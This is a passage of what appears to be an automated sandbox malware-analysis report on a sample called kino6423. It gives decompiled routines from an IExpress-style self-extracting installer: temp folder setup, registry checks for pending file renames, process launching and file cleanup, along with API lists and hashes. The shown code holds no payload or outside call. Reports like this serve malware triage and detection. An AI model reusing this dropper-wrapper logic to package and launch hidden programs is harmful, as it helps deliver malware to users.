Part of subcall function 00E553A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E553FB
Part of subcall function 00E553A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E55402
Part of subcall function 00E553A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E5541F
Part of subcall function 00E553A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E5542B
Part of subcall function 00E553A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E55434

Strings

ppc, xrefs: 00E554E9
mips, xrefs: 00E554F7
alpha, xrefs: 00E554F0
i386, xrefs: 00E554FE
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E5547D, 00E55481, 00E554AB, 00E5551C, 00E5553C, 00E55568

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-510557316
Opcode ID: 65e8b8422a1d331c7b71377bdef489c1e999fdce4b70822cea9e0efe02ed9e06
Instruction ID: e3470a93f658991bb3047f9db4a51dd0ff40787fdc1d5783e39fec809c240b92
Opcode Fuzzy Hash: 65e8b8422a1d331c7b71377bdef489c1e999fdce4b70822cea9e0efe02ed9e06
Instruction Fuzzy Hash: 8F310A73700B149BCB149F36AD656BE77DBAB81347B143D6AAC02B2151EA708E0D8691

Uniqueness

Uniqueness Score: -1.00%

Function 00E5256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00E5256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E00E524E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00e52572
0x00e52573
0x00e52575
0x00e52578
0x00e5257d
0x00e52627
0x00e52583
0x00e52586
0x00e52589
0x00e525eb
0x00e52607
0x00000000
0x00e52609
0x00e5261a
0x00000000
0x00e5261a
0x00000000
0x00e5258b
0x00e5258b
0x00e5259e
0x00e525b2
0x00e525ba
0x00e525cb
0x00e525d1
0x00e525d6
0x00e525da
0x00e525dd
0x00e525dd
0x00e525e3
0x00e525e3
0x00e525e3
0x00e5258b
0x00e52589
0x00e5262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00E54096,00E54096,?,00E51ED3,00000001,00000000,?,?,00E54137,?), ref: 00E525B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00E54096,?,00E51ED3,00000001,00000000,?,?,00E54137,?,00E54096), ref: 00E525CB
RegCloseKey.KERNELBASE(?,?,00E51ED3,00000001,00000000,?,?,00E54137,?,00E54096), ref: 00E525DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00E54096,00E54096,?,00E51ED3,00000001,00000000,?,?,00E54137,?), ref: 00E525FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00E54096,00000000,00000000,00000000,00000000,?,00E51ED3,00000001,00000000), ref: 00E5261A

Strings

System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00E525F5
System\CurrentControlSet\Control\Session Manager, xrefs: 00E525A8
PendingFileRenameOperations, xrefs: 00E525C3

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: 21db7314519c473cb4654c45ca58db368a7bfa919e7b765aa714920a1747db21
Instruction ID: d023e1290d7e21e1a0fca6f4f92a9fc3451acacd866556f711ed436c1308723e
Opcode Fuzzy Hash: 21db7314519c473cb4654c45ca58db368a7bfa919e7b765aa714920a1747db21
Instruction Fuzzy Hash: 52118635912228BFDB249B929C09DFB7F7CEF027A7F5455A9BD08B2040D6704E4CD6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E56A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00E57155();
				_push(0x58);
				_push(0xe572b8);
				E00E57208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0xe588b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0xe588b0; // 0x2
						if(__eflags != 0) {
							 *0xe581e4 = _t58;
							goto L13;
						} else {
							 *0xe588b0 = _t58;
							_t37 = E00E56C3F(0xe510b8, 0xe510c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00E56FF4();
						L13:
						_t68 =  *0xe588b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0xe510b4);
							_push(0xe510ac);
							L00E57202();
							 *0xe588b0 = 2;
						}
						if(_t53 == 0) {
							 *0xe588ac = 0;
						}
						_t71 =  *0xe588b4;
						if( *0xe588b4 != 0 && E00E57060(_t71, 0xe588b4) != 0) {
							_t60 =  *0xe588b4; // 0x0
							 *0xe5a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00E52BFB(0xe50000, 0, _t59); // executed
							 *0xe581e0 = _t30;
							__eflags =  *0xe581f8;
							if( *0xe581f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0xe581e4;
							if( *0xe581e4 == 0) {
								__imp___cexit();
								_t30 =  *0xe581e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E00E5724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00e56a60
0x00e56a6a
0x00e56a6c
0x00e56a71
0x00e56a78
0x00e56a7f
0x00e56a85
0x00e56a8e
0x00e56a91
0x00e56a93
0x00e56a9c
0x00e56aa2
0x00000000
0x00000000
0x00e56aa6
0x00e56ab4
0x00000000
0x00e56aa8
0x00e56aaa
0x00e56aab
0x00e56aab
0x00e56abf
0x00e56abf
0x00e56ac5
0x00e56ad1
0x00e56ad7
0x00e56b05
0x00000000
0x00e56ad9
0x00e56ad9
0x00e56ae9
0x00e56af0
0x00e56af2
0x00000000
0x00e56af4
0x00e56af4
0x00e56afb
0x00e56afb
0x00e56af2
0x00e56ac7
0x00e56ac7
0x00e56ac9
0x00e56b0b
0x00e56b0b
0x00e56b11
0x00e56b13
0x00e56b18
0x00e56b1d
0x00e56b24
0x00e56b24
0x00e56b30
0x00e56b39
0x00e56b39
0x00e56b3b
0x00e56b42
0x00e56b57
0x00e56b5f
0x00e56b65
0x00e56b65
0x00e56b67
0x00e56b6c
0x00e56b6e
0x00e56b71
0x00e56b74
0x00e56b74
0x00e56b79
0x00000000
0x00000000
0x00e56b7d
0x00e56b81
0x00000000
0x00000000
0x00e56b83
0x00e56b8c
0x00e56b8d
0x00e56b90
0x00e56b90
0x00e56b83
0x00e56b81
0x00e56b94
0x00e56b98
0x00e56ba2
0x00e56b9a
0x00e56b9a
0x00e56b9a
0x00e56ba3
0x00e56bab
0x00e56bb0
0x00e56bb5
0x00e56bbc
0x00e56bbf
0x00000000
0x00e56bbf
0x00e56c1e
0x00e56c25
0x00e56c27
0x00e56c2d
0x00e56c2d
0x00e56c32
0x00000000
0x00e56bc5
0x00e56bc5
0x00e56bc8
0x00e56bcc
0x00e56bce
0x00e56bce
0x00e56bd1
0x00e56bd3
0x00e56bd3
0x00e56bd6
0x00e56bda
0x00e56be1
0x00e56be3
0x00e56be5
0x00e56be5
0x00e56be6
0x00e56be6
0x00e56be9
0x00e56bea
0x00e56bea
0x00e56b74
0x00e56c39
0x00e56c3e
0x00e56c3e
0x00e56abe
0x00e56abe
0x00000000

APIs

Part of subcall function 00E57155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E57182
Part of subcall function 00E57155: GetCurrentProcessId.KERNEL32 ref: 00E57191
Part of subcall function 00E57155: GetCurrentThreadId.KERNEL32 ref: 00E5719A
Part of subcall function 00E57155: GetTickCount.KERNEL32 ref: 00E571A3
Part of subcall function 00E57155: QueryPerformanceCounter.KERNEL32(?), ref: 00E571B8

GetStartupInfoW.KERNEL32(?,00E572B8,00000058), ref: 00E56A7F
Sleep.KERNEL32(000003E8), ref: 00E56AB4
_amsg_exit.MSVCRT ref: 00E56AC9
_initterm.MSVCRT ref: 00E56B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00E56B49
exit.KERNELBASE ref: 00E56BBF
_ismbblead.MSVCRT ref: 00E56BDA

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 76ea969d7d778bcac9c615a2db085bf8ea5486346375a7a21b1e851eb5f7edae
Instruction ID: 43d6938e262c388996d06a10c025a94a41f0a7a434a15c1295fafd560e6bbc37
Opcode Fuzzy Hash: 76ea969d7d778bcac9c615a2db085bf8ea5486346375a7a21b1e851eb5f7edae
Instruction Fuzzy Hash: C541F4749047258FDB689B65DA057AA7BF0EB44727F942E2AEC41F72A0CF704C4C8B41

Uniqueness

Uniqueness Score: -1.00%

Function 00E558C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00E558C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00E51680(_t20, _t36, _t33);
					E00E5658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0xe59124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E00E544B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0xe59124 = E00E56285();
					_t14 = 0;
				}
				return _t14;
			}

0x00e558cd
0x00e558d1
0x00e558d3
0x00e558d5
0x00e558d8
0x00e558d8
0x00e558da
0x00e558db
0x00e558e1
0x00e558ed
0x00e558f1
0x00e5591e
0x00e5592c
0x00e55943
0x00e5594a
0x00e5594d
0x00e55953
0x00e55959
0x00000000
0x00e5595b
0x00e5595c
0x00e55963
0x00e5596c
0x00000000
0x00e55972
0x00e55974
0x00e5597a
0x00e5597a
0x00e5596c
0x00e558f3
0x00e55901
0x00e55906
0x00e5590b
0x00e55910
0x00e55910
0x00e55918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00E55534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E558E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00E55534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E55943
LocalFree.KERNEL32(00000000,?,00E55534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E5594D
CloseHandle.KERNEL32(00000000,?,00E55534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E5595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00E55534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00E55963

Strings

TMP4351$.TMP, xrefs: 00E55923
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E558CD, 00E558CF, 00E55919, 00E55962

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
API String ID: 747627703-188559970
Opcode ID: 15d0f89aba093674268d6f0cf9dcfead5cdd1382dd37da67b20c6bda957cd32f
Instruction ID: ec6dd8adb57053dc73592cb092fcd40d3813a17601faa2d5563a76520193f118
Opcode Fuzzy Hash: 15d0f89aba093674268d6f0cf9dcfead5cdd1382dd37da67b20c6bda957cd32f
Instruction Fuzzy Hash: 18113872601720ABC7281F7BAC0DB9B7E9DDF86366F101E25F915F31D1CA74880D86A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E53FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00E53FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0xe58004; // 0x5ba1a886
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00E56CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0xe59124 = E00E56285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E00E544B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0xe58a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0xe59a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0xe59a2c = _t44;
						}
					}
				}
				E00E5411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0xe59a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00e53fef
0x00e53ffa
0x00e54001
0x00e54008
0x00e5400a
0x00e5400b
0x00e54010
0x00e5410a
0x00e5411a
0x00e5411a
0x00e5401c
0x00e5401d
0x00e5401e
0x00e5401f
0x00e54033
0x00e5403b
0x00e540ca
0x00e540e9
0x00e540f8
0x00e54101
0x00e54106
0x00e54106
0x00e54108
0x00e54108
0x00000000
0x00e54108
0x00e54049
0x00e5405c
0x00e54062
0x00e54068
0x00e5406e
0x00e54070
0x00e54077
0x00e5407f
0x00e54089
0x00e5408b
0x00e5408b
0x00e54089
0x00e54077
0x00e54091
0x00e5409c
0x00e540a8
0x00e540b8
0x00000000
0x00e540c2
0x00000000
0x00e540c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00E54033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E54049
GetExitCodeProcess.KERNELBASE ref: 00E5405C
CloseHandle.KERNEL32(?), ref: 00E5409C
CloseHandle.KERNEL32(?), ref: 00E540A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00E540DC
FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00E540E9

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: ec969ddf254511cb39a2cd214eecbf676a3ca53eed965c9ef983a201b5a7dbbe
Instruction ID: c40fe349d28f76e00eadc49ccc4c152cef38f36a55cacf4205fb761264621b92
Opcode Fuzzy Hash: ec969ddf254511cb39a2cd214eecbf676a3ca53eed965c9ef983a201b5a7dbbe
Instruction Fuzzy Hash: 7131D7B1641708AFEB249B66DD48FAB7778DB9470AF101969F905F21E1CA304CC9CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00E551E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E551E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E00E5468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E00E5468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E00E544B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0xe59124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0xe59124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E00E544B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0xe59124 = 0x80070714;
					goto L10;
				}
				E00E544B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xe59124 = E00E56285();
				goto L10;
			}

0x00e551fb
0x00e55207
0x00e5520b
0x00e5523c
0x00e55268
0x00e55270
0x00e5528b
0x00e55293
0x00e5529c
0x00e552a6
0x00e552b0
0x00000000
0x00e552b0
0x00e5529e
0x00e55279
0x00000000
0x00e5527b
0x00e55273
0x00000000
0x00e55273
0x00e5524a
0x00e55250
0x00e55256
0x00000000
0x00e55256
0x00e55219
0x00e55223
0x00000000

APIs

Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546A0
Part of subcall function 00E5468F: SizeofResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546A9
Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546C3
Part of subcall function 00E5468F: LoadResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546CC
Part of subcall function 00E5468F: LockResource.KERNEL32(00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546D3
Part of subcall function 00E5468F: memcpy_s.MSVCRT ref: 00E546E5
Part of subcall function 00E5468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E52F4D,?,00000002,00000000), ref: 00E55201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00E55250

Part of subcall function 00E544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E54518
Part of subcall function 00E544B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00E54554

Part of subcall function 00E56285: GetLastError.KERNEL32(00E55BBC), ref: 00E56285

Strings

<None>, xrefs: 00E55262
UPROMPT, xrefs: 00E551EF, 00E55230

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: 36d8a2f5844e5ef693d2d02cda08b2be7fccb5c0d6e4849a0f019726e48370dc
Instruction ID: 1e7aa8ccae6d891b319e3cb3f9dff1cdb0e3a7eaa1313ccb46ecfe122e3b5aaa
Opcode Fuzzy Hash: 36d8a2f5844e5ef693d2d02cda08b2be7fccb5c0d6e4849a0f019726e48370dc
Instruction Fuzzy Hash: AF1103BA241701AFD7186BB25D55B7B21EDDB88357F015C29BE02F61E1DA788C080225

Uniqueness

Uniqueness Score: -1.00%

Function 00E552B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00E552B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0xe58004; // 0x5ba1a886
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0xe591e0; // 0x6b8e98
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0xe58a24 == 0 &&  *0xe59a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0xe58a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0xe58a24 == 0 &&  *0xe59a30 == 0) {
					_push(_t22);
					E00E51781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
					if(( *0xe59a34 & 0x00000020) != 0) {
